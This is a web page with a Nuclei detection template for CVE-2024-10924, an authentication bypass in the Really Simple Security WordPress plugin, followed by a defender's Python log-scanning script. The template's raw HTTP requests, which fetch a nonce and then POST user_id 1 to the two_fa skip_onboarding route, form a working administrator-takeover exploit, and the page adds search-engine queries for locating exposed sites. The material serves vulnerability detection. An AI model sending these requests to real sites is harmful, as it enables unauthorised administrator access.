Really Simple Security < 9.1.2 - Authentication Bypass
ID: CVE-2024-10924
Severity: critical
Author: yaser_s
Tags: cve,cve2024,wp,wp-plugin,wordpress,auth-bypass,really-simple-ssl
Description
The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This is due to improper user check error handling in the two-factor REST API actions with the ‘check_login_and_get_user’ function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the “Two-Factor Authentication” setting is enabled (disabled by default).
YAML Source
id: CVE-2024-10924

info:
  name: Really Simple Security < 9.1.2 - Authentication Bypass
  author: yaser_s
  severity: critical
  description: |
    The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This is due to improper user check error handling in the two-factor REST API actions with the 'check_login_and_get_user' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default).
  remediation: Fixed in 9.1.2
  reference:
    - https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L277
    - https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L278
    - https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L67
    - https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl
    - https://wpscan.com/vulnerability/8e1f4374-2e41-4c27-80d4-db172015c6be/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d5d05ad-1a7a-43d2-bbbf-597e975446be?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-10924
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-10924
    cwe-id: CWE-288,CWE-306
    epss-score: 0.00101
    epss-percentile: 0.4287
    cpe: cpe:2.3:a:really-simple-plugins:really_simple_security:*:*:*:*:-:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: really-simple-plugins
    product: really_simple_security
    framework: wordpress
    shodan-query: html:"/wp-content/plugins/really-simple-ssl"
    fofa-query: body="/wp-content/plugins/really-simple-ssl"
  tags: cve,cve2024,wp,wp-plugin,wordpress,auth-bypass,really-simple-ssl

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET /wp-login.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        part: body_1
        group: 1
        regex:
          - '"nonce":"([a-z0-9]+)"\}'
        internal: true

  - raw:
      - |
        POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "user_id": 1,
          "login_nonce": "{{nonce}}",
          "redirect_to": "/wp-admin/"
        }

    matchers:
      - type: word
        part: body
        words:
          - '"redirect_to":"\/wp-admin\/"'
        internal: true

  - raw:
      - |
        GET /wp-admin/profile.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Personal Options'

      - type: word
        part: content_type
        words:
          - 'text/html'
# digest: 490a0046304402204abade2aba55b6eea42a22ccf1591c5d83ea31d23f9f492ab7347d8bba93aba00220193ab92d79c45b7af0695a5f7e846ac7ea1183dce997bc97b0647b1382c3aa8a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-10924.yaml"
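On the defender's side, the two facts worth acting on from this page are the affected version range (9.0.0 through 9.1.1.1, fixed in 9.1.2) and the REST route the template's second request targets. The following Python is an added example written for this page; it is not part of the Nuclei template or of the Really Simple Security plugin. It assumes web server access logs in the common combined format and that the route can appear either in the `?rest_route=` query form used by the template or under the standard WordPress `/wp-json/` prefix; the log lines are constructed sample data, and the helper names are hypothetical.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Added, hypothetical defender-side helpers for CVE-2024-10924. Not part of the
# Nuclei template or the plugin. Assumptions: combined-format access logs, and the
# REST route reachable via "?rest_route=" or the standard "/wp-json/" prefix.

# REST route named in the template (without "/wp-json" or "?rest_route=").
VULN_ROUTE = "/reallysimplessl/v1/two_fa/skip_onboarding"

# Affected range from the advisory: 9.0.0 up to and including 9.1.1.1; fixed in 9.1.2.
AFFECTED_MIN = (9, 0, 0)
FIXED_IN = (9, 1, 2)

# Combined log format: ip ident user [ts] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_version(text):
    """Turn '9.1.1.1' into (9, 1, 1, 1); stops at the first non-numeric part."""
    parts = []
    for piece in text.strip().split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    return tuple(parts)


def is_affected_version(text):
    """True when the installed plugin version lies inside the advisory's affected range."""
    v = parse_version(text)
    return bool(v) and AFFECTED_MIN <= v < FIXED_IN


def rest_route_of(target):
    """Normalise a request target to its WordPress REST route, or None if it has none."""
    url = urlsplit(target)
    if url.path.startswith("/wp-json/"):
        return url.path[len("/wp-json"):]
    routes = parse_qs(url.query).get("rest_route")
    return routes[0] if routes else None


def find_skip_onboarding_requests(log_text):
    """Return one record per logged request that hit the vulnerable two_fa route."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or rest_route_of(m.group("target")) != VULN_ROUTE:
            continue
        status = int(m.group("status"))
        hits.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "method": m.group("method"),
            "status": status,
            # A POST answered with 200 has the shape of the template's second request
            # and deserves triage (check the preceding login/nonce fetch and what the
            # same client did next); other hits are more likely probes.
            "triage": m.group("method") == "POST" and status == 200,
        })
    return hits


# Constructed sample log lines (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = """\
203.0.113.10 - - [18/Nov/2024:10:01:02 +0000] "GET /wp-login.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [18/Nov/2024:10:01:03 +0000] "POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 200 210 "-" "Mozilla/5.0"
203.0.113.10 - - [18/Nov/2024:10:01:04 +0000] "GET /wp-admin/profile.php HTTP/1.1" 200 40960 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Nov/2024:10:05:00 +0000] "GET /wp-json/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 401 95 "-" "curl/8.0"
192.0.2.44 - - [18/Nov/2024:10:07:00 +0000] "GET /index.php HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    print("installed 9.1.1.1 affected:", is_affected_version("9.1.1.1"))
    for hit in find_skip_onboarding_requests(SAMPLE_LOG):
        print(hit)
```

The route match is done on the normalised REST route rather than on a raw substring so that both URL forms are caught and unrelated paths that merely contain the string are not. A hit flagged for triage is a reason to look at the surrounding lines from the same client, not proof of compromise on its own; the version check is what decides whether the site was exposed at all, and the remediation from the page is the upgrade to 9.1.2.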